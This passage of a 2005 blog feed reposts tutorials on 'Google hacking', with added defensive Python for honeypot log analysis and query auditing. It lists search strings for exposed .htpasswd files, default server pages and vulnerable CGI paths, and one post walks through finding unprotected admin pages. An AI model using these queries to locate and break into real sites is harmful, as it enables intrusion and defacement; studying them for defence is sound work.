After a great deal of media attention, the term came to describe those who "troll the Internet for confidential goods." Either description is fine, really. What matters is that the term googledork conveys the concept that sensitive stuff is on the web, and Google can help you find it. The official googledorks page lists many different examples of unbelievable things that have been dug up through Google by the maintainer of the page, Johnny Long. Each listing shows the Google search required to find the information, along with a description of why the data found on each page is so interesting.&lt;br /&gt;GooPot&lt;br /&gt;The concept of a honeypot is very straightforward. According to &lt;a href="http://www.techtarget.com/"&gt;http://www.techtarget.com&lt;/a&gt;, "A honey pot is a computer system on the Internet that is expressly set up to attract and 'trap' people who attempt to penetrate other people's computer systems."&lt;br /&gt;To learn how new attacks might be conducted, the maintainers of a honeypot system monitor, dissect, and catalog each attack, focusing on those attacks that seem unique.&lt;br /&gt;An extension of the classic honeypot system, a web-based honeypot or "page pot" is designed to attract those employing the techniques outlined in this article. The concept is fairly straightforward. Consider a simple googledork entry like this:&lt;br /&gt;inurl:admin inurl:userlist&lt;br /&gt;This entry could easily be replicated with a web-based honeypot by creating an index.html page that referenced another index.html file in an /admin/userlist directory. If a web search engine such as Google was instructed to crawl the top-level index.html page, it would eventually find the link pointing to /admin/userlist/index.html. This link would satisfy the Google query of inurl:admin inurl:userlist, eventually attracting a curious Google hacker.&lt;br /&gt;The referrer variable can be inspected to figure out how a web surfer found a web page through Google. 
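&lt;br /&gt;An added example, not part of the original article or of GooPot itself: one way a page pot maintainer could pull the Google query out of the referrer of each request in a web server access log. The log lines, addresses and the /admin/userlist/ pot path are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3} \S+ "([^"]*)" "[^"]*"$'
)
# Advanced operators worth tagging when they show up in a visitor's query.
OPERATOR_RE = re.compile(
    r"\b(allinurl|allintitle|inurl|intitle|intext|filetype|site|link|cache):", re.I
)

# Constructed sample lines (documentation addresses, hypothetical page pot path).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Feb/2005:10:13:00 +0800] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://www.google.com/search?q=inurl%3Aadmin+inurl%3Auserlist" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Feb/2005:10:15:42 +0800] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://www.google.co.uk/search?q=inurl:admin+inurl:userlist" "Mozilla/4.0"',
    '198.51.100.23 - - [02/Feb/2005:10:18:30 +0800] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://www.google.com/search?q=allinurl%3Aadmin+userlist" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Feb/2005:10:20:01 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [02/Feb/2005:10:31:09 +0800] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://example.org/links.html" "Mozilla/5.0"',
]


def google_query(referer):
    """Return the search string if the Referer is a Google results URL, else None.

    The Referer header is supplied by the client, so treat the result as a lead,
    not as proof of how the visitor arrived.
    """
    try:
        parts = urlsplit(referer)
        host = (parts.hostname or "").lower()
    except ValueError:
        return None
    if not host.startswith(("www.google.", "google.")):
        return None
    params = parse_qs(parts.query)          # decodes %3A and turns '+' into spaces
    terms = params.get("q") or params.get("as_q")
    return " ".join(terms[0].split()) if terms else None


def pot_hits(lines, pot_prefix="/admin/userlist/"):
    """Return one record per request for the page pot that arrived from a Google search."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                        # not a combined-format line
        ip, when, path, referer = m.groups()
        if not path.startswith(pot_prefix):
            continue                        # ordinary page, not the pot
        query = google_query(referer)
        if query is None:
            continue                        # visitor did not come from a search
        ops = sorted({op.lower() for op in OPERATOR_RE.findall(query)})
        hits.append({"ip": ip, "time": when, "query": query, "operators": ops})
    return hits


def top_queries(hits):
    """Count identical queries so new search patterns stand out."""
    return Counter(h["query"].lower() for h in hits).most_common()


if __name__ == "__main__":
    for query, count in top_queries(pot_hits(SAMPLE_LOG)):
        print(count, query)
```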
This bit of information is critical to the maintainer of a page pot system, because it outlines the exact method the Google searcher used to locate the page pot system. The information aids in protecting other web sites from similar queries.&lt;br /&gt;GooPot, the Google honeypot system, uses enticements based on the many techniques outlined in the googledorks collection and this document. In addition, the GooPot more closely resembles the juicy targets that Google hackers typically go after. Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover new search types and to publicize them in the form of googledorks listings, creating a self-sustaining cycle for learning about and protecting from search engine attacks.&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110731069495725935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110731069495725935' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110731069495725935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110731069495725935'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/google-hacking-mini-guide-2.html' title='Google Hacking Mini-Guide #2'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' 
src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110730914915445601</id><published>2005-02-02T09:49:00.000+08:00</published><updated>2005-02-02T10:03:13.483+08:00</updated><title type='text'>Google Hacking Mini-Guide</title><content type='html'>( &lt;a href="http://www.peachpit.com/articles/article.asp?p=170880"&gt;http://www.peachpit.com/articles/article.asp?p=170880&lt;/a&gt; )&lt;br /&gt;By Johnny Long.&lt;br /&gt;Using search engines such as Google, "search engine hackers" can easily find exploitable targets and sensitive data. This article outlines some of the techniques used by hackers and discusses how to prevent your site from becoming a victim of this form of information leakage.&lt;br /&gt;The Google search engine found at &lt;a href="http://www.google.com/"&gt;http://www.google.com/&lt;/a&gt; offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed "Google hacking." The intent of this article is to educate web administrators and the security community in the hopes of eventually stopping this form of information leakage. This document is an excerpt of the full Google Hacker's Guide published by Johnny Long, and located at &lt;a href="http://johnny.ihackstuff.com/"&gt;http://johnny.ihackstuff.com/&lt;/a&gt;.
&lt;br /&gt;Basic Search Techniques&lt;br /&gt;Since the Google web interface is so easy to use, I won't describe the basic functionality of the &lt;a href="http://www.google.com/"&gt;http://www.google.com/&lt;/a&gt; web page. Instead, I'll focus on the various operators available:&lt;br /&gt;Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No space follows these signs.&lt;br /&gt;To search for a phrase, supply the phrase surrounded by double quotes (" ").&lt;br /&gt;A period (.) serves as a single-character wildcard.&lt;br /&gt;An asterisk (*) represents any word—not the completion of a word, as is traditionally used.&lt;br /&gt;Google advanced operators help refine searches. Advanced operators use a syntax such as the following:&lt;br /&gt;operator:search_term&lt;br /&gt;Notice that there's no space between the operator, the colon, and the search term.&lt;br /&gt;The site: operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.&lt;br /&gt;The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.&lt;br /&gt;The link: operator instructs Google to search within hyperlinks for a search term.&lt;br /&gt;The cache: operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.&lt;br /&gt;The intitle: operator instructs Google to search for a term within the title of a document.&lt;br /&gt;The inurl: operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.
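&lt;br /&gt;An added example, not from the original article: a simplified model of the operator rules above (not Google's actual matching), usable for checking which of your own pages a given query would surface. The sample pages and the example.com host are constructed; the sample queries are ones quoted elsewhere on this page.

```python
import re
from urllib.parse import urlsplit

KNOWN_OPERATORS = {"site", "filetype", "intitle", "inurl", "intext", "allintitle", "allinurl"}
# One token: optional +/- sign, optional operator and colon, then a quoted phrase or a bare word.
TOKEN_RE = re.compile(r'([+-]?)(?:([a-z]+):)?(?:"([^"]*)"|(\S+))', re.IGNORECASE)

# Constructed pages: url, title, and visible text with markup already removed.
SAMPLE_PAGES = [
    {"url": "http://www.example.com/backup/", "title": "Index of /backup",
     "text": "Index of /backup Name Last modified Size Description Parent Directory "
             "db.tar.gz 02-Feb-2005 10:13 4.2M Apache/1.3.27 Server at www.example.com Port 80"},
    {"url": "http://www.example.com/resources.html",
     "title": "Index of Native American Resources on the Internet",
     "text": "Links to tribal home pages and organizations."},
    {"url": "http://www.example.com/admin/userlist/index.html", "title": "User list",
     "text": "Restricted area."},
]
SAMPLE_QUERIES = [
    'intitle:index.of "parent directory"',
    "intitle:index.of server.at",
    "Intitle:Test.Page.for.Apache seeing.this.instead",
    "inurl:admin inurl:userlist",
]


def term_regex(term):
    """Translate one term: '.' is a single-character wildcard, '*' stands for any word."""
    out = []
    for ch in term:
        if ch == ".":
            out.append(".")
        elif ch == "*":
            out.append(r"\S+")
        elif ch.isspace():
            out.append(r"\s+")
        else:
            out.append(re.escape(ch))
    head = r"\b" if term[:1].isalnum() else ""   # match whole words, not substrings
    tail = r"\b" if term[-1:].isalnum() else ""
    return re.compile(head + "".join(out) + tail, re.IGNORECASE)


def parse_query(query):
    """Return a list of (negated, field, term) constraints for a search string."""
    constraints, sticky = [], None
    for sign, op, quoted, bare in TOKEN_RE.findall(query):
        term, op = quoted or bare, op.lower()
        if not term:
            continue
        if op and op not in KNOWN_OPERATORS:
            term, op = op + ":" + term, ""       # e.g. a URL, not an operator
        if op.startswith("all"):
            sticky = op[3:]                      # allintitle: covers every later term
            op = sticky
        constraints.append((sign == "-", op or sticky or "any", term))
    return constraints


def matches(page, query):
    """True if every constraint in the query holds for the page."""
    parts = urlsplit(page["url"])
    fields = {"intitle": page["title"], "inurl": page["url"], "intext": page["text"],
              "any": " ".join([page["title"], page["url"], page["text"]])}
    for negated, field, term in parse_query(query):
        if field == "site":
            wanted = term.split("://")[-1].strip("/").lower()
            host = (parts.hostname or "").lower()
            hit = host == wanted or host.endswith("." + wanted)
        elif field == "filetype":
            hit = parts.path.lower().endswith("." + term.lower())
        else:
            hit = term_regex(term).search(fields[field]) is not None
        if hit == negated:                       # required term missing, or excluded term present
            return False
    return True


def audit(pages, queries):
    """Return (url, query) for every page that a listed query would surface."""
    return [(p["url"], q) for p in pages for q in queries if matches(p, q)]


if __name__ == "__main__":
    for url, query in audit(SAMPLE_PAGES, SAMPLE_QUERIES):
        print(url, "matches", query)
```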
&lt;br /&gt;Google Hacking Mini-Guide&lt;br /&gt;By Johnny Long.&lt;br /&gt;Date: May 7, 2004.&lt;br /&gt;Google Hacking Techniques&lt;br /&gt;By using the basic search techniques combined with Google's advanced operators, anyone can perform information-gathering and vulnerability-searching using Google. This technique is commonly referred to as Google hacking.&lt;br /&gt;Site Mapping&lt;br /&gt;To find every web page Google has crawled for a specific site, use the site: operator. Consider the following query:&lt;br /&gt;site:http://www.microsoft.com microsoft&lt;br /&gt;This query searches for the word microsoft, restricting the search to the &lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com/&lt;/a&gt; web site. How many pages on the Microsoft web server contain the word microsoft? According to Google, all of them! Google searches not only the content of a page, but the title and URL as well. The word microsoft appears in the URL of every page on &lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com/&lt;/a&gt;. With a single query, an attacker gains a rundown of every web page on a site cached by Google.&lt;br /&gt;There are some exceptions to this rule. If a link on the Microsoft web page points back to the IP address of the Microsoft web server, Google will cache that page as belonging to the IP address, not the &lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com/&lt;/a&gt; web server. In this special case, an attacker would simply alter the query, replacing the word microsoft with the IP address(es) of the Microsoft web server.&lt;br /&gt;Finding Directory Listings&lt;br /&gt;Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.&lt;br /&gt;Locating directory listings with Google is fairly straightforward. 
Figure 1 shows that most directory listings begin with the phrase Index of, which also shows in the title. 
An obvious query to find this type of page might be intitle:index.of, which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:&lt;br /&gt;Index of Native American Resources on the Internet&lt;br /&gt;LibDex—Worldwide index of library catalogues&lt;br /&gt;Iowa State Entomology Index of Internet Resources&lt;br /&gt;Judging from the titles of these documents, it's obvious that not only are these web pages intentional, they're also not the directory listings we're looking for. Several alternate queries provide more accurate results:&lt;br /&gt;intitle:index.of "parent directory"&lt;br /&gt;intitle:index.of name size&lt;br /&gt;These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.&lt;br /&gt;Versioning: Obtaining the Web Server Software/Version&lt;br /&gt;The exact version of the web server software running on a server is one piece of information an attacker needs before launching a successful attack against that web server. If an attacker connects directly to that web server, the HTTP (web) headers from that server can provide this essential information. It's possible, however, to retrieve similar information from Google's cache without ever connecting to the target server under investigation. One method involves using the information provided in a directory listing.&lt;br /&gt;This example was gathered using the following query:&lt;br /&gt;intitle:index.of server.at&lt;br /&gt;This query focuses on the term index of in the title and server at appearing at the bottom of the directory listing. 
This type of query can also be pointed at a particular web server:&lt;br /&gt;intitle:index.of server.at site:aol.com&lt;br /&gt;The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com both run Apache web servers.&lt;br /&gt;It's also possible to determine the version of a web server based on default pages installed on that server. When a web server is installed, it generally will ship with a set of default web pages, like the Apache 1.2.6.&lt;br /&gt;These pages can make it easy for a site administrator to get a web server running. By providing a simple page to test, the administrator can simply connect to his own web server with a browser to validate that the web server was installed correctly. Some operating systems even come with web server software already installed. In this case, an Internet user may not even realize that a web server is running on his machine. This type of casual behavior on the part of an Internet user will lead an attacker to rightly assume that the web server is not well maintained, and by extension is insecure. 
By further extension, the attacker can assume that the entire operating system of the server may be vulnerable by virtue of poor maintenance.&lt;br /&gt;The following table provides a brief rundown of some queries that can locate various default pages.&lt;br /&gt;&lt;table&gt;&lt;tr&gt;&lt;th&gt;Apache Server Version&lt;/th&gt;&lt;th&gt;Query&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Apache 1.3.0–1.3.9&lt;/td&gt;&lt;td&gt;Intitle:Test.Page.for.Apache It.worked! this.web.site!&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Apache 1.3.11–1.3.26&lt;/td&gt;&lt;td&gt;Intitle:Test.Page.for.Apache seeing.this.instead&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Apache 2.0&lt;/td&gt;&lt;td&gt;Intitle:Simple.page.for.Apache Apache.Hook.Functions&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Apache SSL/TLS&lt;/td&gt;&lt;td&gt;Intitle:test.page "Hey, it worked !" 
"SSL/TLS-aware"&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Many IIS servers&lt;/td&gt;&lt;td&gt;intitle:welcome.to intitle:internet IIS&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Unknown IIS server&lt;/td&gt;&lt;td&gt;intitle:"Under construction" "does not currently have"&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;IIS 4.0&lt;/td&gt;&lt;td&gt;intitle:welcome.to.IIS.4.0&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;IIS 4.0&lt;/td&gt;&lt;td&gt;allintitle:Welcome to Windows NT 4.0 Option Pack&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;IIS 4.0&lt;/td&gt;&lt;td&gt;allintitle:Welcome to Internet Information Server&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;IIS 5.0&lt;/td&gt;&lt;td&gt;allintitle:Welcome to Windows 2000 Internet Services&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;IIS 6.0&lt;/td&gt;&lt;td&gt;allintitle:Welcome to Windows XP Server Internet Services&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Many Netscape servers&lt;/td&gt;&lt;td&gt;allintitle:Netscape Enterprise Server Home Page&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Unknown Netscape server&lt;/td&gt;&lt;td&gt;allintitle:Netscape FastTrack Server Home Page&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Using Google as a CGI Scanner&lt;br /&gt;To accomplish its task, a CGI scanner must know what exactly to search for on a web server. 
Such scanners often utilize a data file filled with vulnerable files and directories like the one shown below:&lt;br /&gt;/cgi-bin/cgiemail/uargg.txt&lt;br /&gt;/random_banner/index.cgi&lt;br /&gt;/random_banner/index.cgi&lt;br /&gt;/cgi-bin/mailview.cgi&lt;br /&gt;/cgi-bin/maillist.cgi&lt;br /&gt;/cgi-bin/userreg.cgi&lt;br /&gt;/iissamples/ISSamples/SQLQHit.asp&lt;br /&gt;/iissamples/ISSamples/SQLQHit.asp&lt;br /&gt;/SiteServer/admin/findvserver.asp&lt;br /&gt;/scripts/cphost.dll&lt;br /&gt;/cgi-bin/finger.cgi&lt;br /&gt;Combining a list like this one with a carefully crafted Google search, Google can be used as a CGI scanner. Each line can be broken down and used in either an index.of or inurl search to find vulnerable targets. For example, a Google search for this:&lt;br /&gt;allinurl:/random_banner/index.cgi&lt;br /&gt;A hacker can take sites returned from this Google search, apply a bit of hacker "magic," and eventually get the broken random_banner program to cough up any file on that web server, including the password file.&lt;br /&gt;Note that actual exploitation of a found vulnerability crosses the ethical line, and is not considered mere web searching.
&lt;br /&gt;Of the many Google hacking techniques we've looked at, this technique is one of the best candidates for automation, because the CGI scanner vulnerability files can be very large. The gooscan tool, written by j0hnny, performs this and many other functions. Gooscan and automation are discussed below.&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110730914915445601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110730914915445601' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730914915445601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730914915445601'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/google-hacking-mini-guide.html' title='Google Hacking Mini-Guide'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110730886633553900</id><published>2005-02-02T09:43:00.000+08:00</published><updated>2005-02-02T09:47:46.336+08:00</updated><title type='text'>Advanced Google Hacking</title><content type='html'>I am in no way, shape, or form responsible for what you do with this information; this information is solely for educational purposes only.
&lt;br /&gt;Introduction&lt;br /&gt;Well, you look at the title and I’m sure you're all like “Not another google hacking tutorial…”. You might all think that google hacking is pretty much dead, admins have gotten smart. Well, the fact of the matter is, Google hacking is very far from dead, and a lot of admins are super far from being smart. The new virus that uses google’s searching power to find vulnerable sites just proves this point.&lt;br /&gt;Now I have realized that there is a good tutorial on Google Hacking on AO already, and if you have not seen it you can find it here:&lt;br /&gt;&lt;a href="http://www.antionline.com/showthrea...did=257512"&gt;http://www.antionline.com/showthrea...did=257512&lt;/a&gt;&amp;amp;&lt;br /&gt;This tutorial is different than that one and many others, though; I am not simply going to show you what google can be used for, that has already been covered a ton of times. I am not going to simply show you “Index of” +htpasswd either; that too has been shown tons of times. I’m not going to teach you basic google operators and commands. Those have already been covered numerous times on AO and on google itself. They can be found here:&lt;br /&gt;&lt;a href="http://www.google.com/help/refinesearch.html"&gt;http://www.google.com/help/refinesearch.html&lt;/a&gt;&lt;br /&gt;and here:&lt;br /&gt;&lt;a href="http://www.google.com/help/operators.html"&gt;http://www.google.com/help/operators.html&lt;/a&gt;&lt;br /&gt;So What The Hell Is This Tutorial About?&lt;br /&gt;In this tutorial I am going to cover an advanced side to google hacking… If that makes sense… I see a lot of google tutorials telling you to go for the “Index of” +htpasswd and other password files. Most of these are shadowed anyway. Well, I’m going to base this tutorial on combinations. That’s right, combinations.&lt;br /&gt;Combinations&lt;br /&gt;You can’t Google Hack like you used to these days. 
A couple years ago all you had to do was search for inurl:admin.asp and you would have gotten hundreds of sites that were vulnerable. But these days that just gives you a bunch of crap, like companies trying to sell you their administrator software and such… Now you have to think of a combination of search commands and keywords to craft together to get what you want.&lt;br /&gt;Now let's think about this for a minute… What exactly do we want? Admin login pages? Nah… Password lists? Maybe but… nah… Ah! I know… Let's try for administration pages! You know, the pages that allow the administrator to edit, delete, and configure things on their website?&lt;br /&gt;First things first, we need a base keyword. How about:&lt;br /&gt;inurl:edit&lt;br /&gt;Not much luck. Let's try adding something to it, but what? We obviously want something that will edit a site. How about we add +intitle:admin to the search?&lt;br /&gt;inurl:edit +intitle:admin&lt;br /&gt;Hmm... Doesn't look good. Looks like just a bunch of manuals and instructions. You might find something there, but it's doubtful; there's just too much junk there. Looks like we need to add in a couple of things. Let's look for a specific file extension. We do this with the filetype command. How about we add the command filetype:asp.&lt;br /&gt;inurl:edit +intitle:admin +filetype:asp&lt;br /&gt;Now what we are doing is searching only for files that are asp's and have "edit" in the url and "admin" in the title. We enter this in google and we do get some administration areas, but there are still a lot of demos and manuals and other junk. We also get a lot of admin logins, which aren't bad, but we want to bypass the login screen. How do we do that? Well, let's add a -login -password to the search:&lt;br /&gt;inurl:edit +intitle:admin +filetype:asp -login -password&lt;br /&gt;BINGO! This search gives you a bunch of sites that you can get admin access to. We are happy with those results, but you should try to spice things up a bit. 
Like adding quotes and *'s to some things:&lt;br /&gt;inurl:"*edit*" +intitle:"*admin*" +filetype:asp -login -password&lt;br /&gt;This gives you some other interesting things as well. I think everyone knows what the quotes do, but I don't think a lot of people know what the *'s do. Well, when they are added that means as long as "edit" is within ANYTHING google will show it. Like for instance:&lt;br /&gt;inurl:"*edit*"&lt;br /&gt;Might bring up a site with the url as /frontpage_edit.asp. Get the point? This could be used to find a certain piece of software you're trying to exploit. For example:&lt;br /&gt;intext:"Powered by*"&lt;br /&gt;The possibilities are endless!&lt;br /&gt;Conclusion&lt;br /&gt;Well, that's that. I wrote this tutorial to kind of be an extension of the one written before here on AO and to once again show the power of google and at the same time show that google hacking is not dead. There is so much more to explain, so many other ways to do such things and even more! Go and explore on your own using different combinations. Look at all the poorly configured sites. But don't exploit them! Just because you can copy and paste that search string and then find a vulnerable site and deface them or steal information does not make you some super l33t h4ck3r d00d. I almost didn't write this tutorial because I was afraid it would be too easy for a dishonest person on this site to mess things up. We don't need any more skiddies defacing sites and yappin their gums off about their political views (dr. toker will agree). If you want to be a true white hat contact the admin and tell him of his problem.&lt;br /&gt;BTW, if you guys were interested, that worm that used google to spread did a real number! Google this:&lt;br /&gt;intitle:"This site is defaced!!!" 
intext:"NeverEverNoSanity WebWorm generation"&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110730886633553900/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110730886633553900' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730886633553900'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730886633553900'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/advanced-google-hacking.html' title='Advanced Google Hacking'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110730843292292000</id><published>2005-02-02T09:33:00.000+08:00</published><updated>2005-02-02T09:40:32.923+08:00</updated><title type='text'>Google as a Hacking Tool</title><content type='html'>This tutorial is an introduction to the security risks associated with common internet search engines. In the past few years, Google has come to be the most popular search engine in the world, so much so that many consider it the only one worth using. For this reason this tutorial will focus on Google; however, it can be safely assumed that most of what is said here applies to other similar engines as well.
&lt;br /&gt;WEB VULNERABILITIES&lt;br /&gt;A system is vulnerable when an attacker is able to make it do something it's not supposed to. There are generally two types of vulnerabilities to be found on the web: software vulnerabilities and user misconfigurations.&lt;br /&gt;Although there are some sophisticated attackers who target a specific system and try to discover vulnerabilities which will allow them access, the vast majority of attackers start out with a specific software vulnerability or common user misconfiguration which they already know how to exploit, and simply try to find - or scan for - systems which have this vulnerability. Google is of limited use to the first attacker, but invaluable to the second, as will be explained in the next section.&lt;br /&gt;SCANNERS&lt;br /&gt;When an attacker knows the sort of vulnerability they want to exploit but has no specific target, they employ a scanner. This is a program which automates the process of examining a massive quantity of systems for a security flaw. The earliest computer-related scanner, for example, was a wardialer: a program which would dial long lists of phone numbers and record which ones responded with a modem handshake.&lt;br /&gt;Today there are scanners which automatically query IP addresses to see what ports they have open and determine what operating system they're probably running; some even determine the geographic location of the system. One of the most popular IP scanners is NMap ( &lt;a href="http://www.insecure.org/"&gt;http://www.insecure.org&lt;/a&gt; ). When using NMap, one specifies a range of hosts and the specific services on each one to scan for. The program will then return a list of the available (and presumably vulnerable) systems.&lt;br /&gt;GOOGLE AS A SCANNER&lt;br /&gt;With a little creativity, Google can be made to operate in a similar way as NMap, though they use different protocols. 
As an example, let's pretend that we know a great new exploit that will allow us to steal credit card information from any online store that uses the SHOP.PL scripts. We know that &lt;a href="http://www.secure.com/"&gt;www.secure.com&lt;/a&gt; uses SHOP.PL, but when we try our exploit it turns out that they already patched the vulnerability. As dedicated malicious hackers, though, we don't give up. We turn to Google and enter the following search string:&lt;br /&gt;inurl:shop.pl&lt;br /&gt;Feel free to try this - it's not illegal and shouldn't get you into trouble. Note that the above search employs advanced operators, which are described here: ( &lt;a href="http://www.google.com/help/operators.html"&gt;http://www.google.com/help/operators.html&lt;/a&gt; ). What is produced is a list of all sites which have "shop.pl" somewhere in their URL, essentially a list of potentially vulnerable targets. Just as with NMap, all that's left to do is try our exploit against each site on the list.&lt;br /&gt;There are countless variations on this scheme, including some rather clever ways to find particular versions of server programs. For example, if one was to enter:&lt;br /&gt;"seeing this instead" intitle:"test page for apache"&lt;br /&gt;It would return a list of sites using Apache 1.3.11 - 1.3.26, because those specific phrases are used on the default page for those versions. Once again, if an attacker had an exploit for Apache 1.3.11 - 1.3.26, it would take very little effort to compromise a large number of systems.&lt;br /&gt;GOOGLE AS AN EXPLOITER&lt;br /&gt;It seems ridiculous, but sometimes administrators misconfigure their sites so badly, it's not even necessary to use a "third party" exploit in order to gain access to a system. Google indexes the web very aggressively, and unless a file is put in a password-protected or otherwise access-restricted area of your website, there is a good chance that it will be searchable in Google. 
This includes password files, credit reports, medical records, etc.&lt;br /&gt;In cases where the files are not adequately protected from Google, the search engine has basically already performed the exploit for the attacker. If, for example, a script kiddie wanted to deface a random web site, he or she would simply search for:&lt;br /&gt;intitle:"Index of" htpasswd&lt;br /&gt;Which would return a list of all poor users who allowed Google to index their .htpasswd file, probably containing the administrative username and password for their web page. All the attacker would need to do is open the file, crack the password, and deface away.&lt;br /&gt;GOOGLE AS A PROXY&lt;br /&gt;A proxy is an intermediary system which an attacker can use to disguise his or her identity. For example, if I was to gain remote access to Bill Gates' computer and cause it to run attacks on cia.gov, it would appear to the Feds that Bill Gates was hacking them. His computer would be acting as a proxy. Google can be used in a similar way, as is explained here.&lt;br /&gt;Even if Google didn't provide such an easy way to locate vulnerabilities, there are other tools which can do that particular job. A program called AccessDiver ( &lt;a href="http://www.accessdiver.com/"&gt;http://www.accessdiver.com/&lt;/a&gt; ) allows the user to specify a domain name, and it tries to access URLs which commonly lead to sensitive data or system access. This tool was, however, intended for use by administrators on their own networks. If anyone tried to use this tool against cia.gov, the system would deny them access, log their IP, and send them to jail for attempted computer trespass.&lt;br /&gt;When using Google, there is very little danger of detection, because the attacker's computer doesn't have to access every site itself and ask suspicious questions like "Do you have a page containing .htpasswd?" 
The search engine has already gathered this information and will give it freely without a peep to the vulnerable site. Things get even more interesting when you consider the Google cache function. If you have never used this feature, try this:&lt;br /&gt;Do a Google search for "USA Today". Click on the first result and read a few of the headlines. Now click back to return to your search. This time, click the "Cached" link to the right of the URL of the page you just visited. Notice anything weird? You're probably looking at the headlines from yesterday or the day before. Why, you ask? It's because whenever Google indexes a page, it saves a copy of the entire thing to its server. You are accessing the most recent copy Google made of &lt;a href="http://www.usatoday.com/"&gt;www.usatoday.com&lt;/a&gt;.&lt;br /&gt;This can be used for a lot more than reading old newspapers. Our attacker can now use Google to scan for sensitive files without alerting potential targets, and even when a target is found the attacker can access its files from the Google cache without ever making contact with the target's server. The only server with any logs of the attack would be Google's, and it's unlikely they will realize an attack has taken place.&lt;br /&gt;An even more elaborate trick involves crafting a special URL that would not normally be indexed by Google, perhaps one involving a buffer overflow or SQL injection (common web exploits). This URL is then submitted to Google as a new web 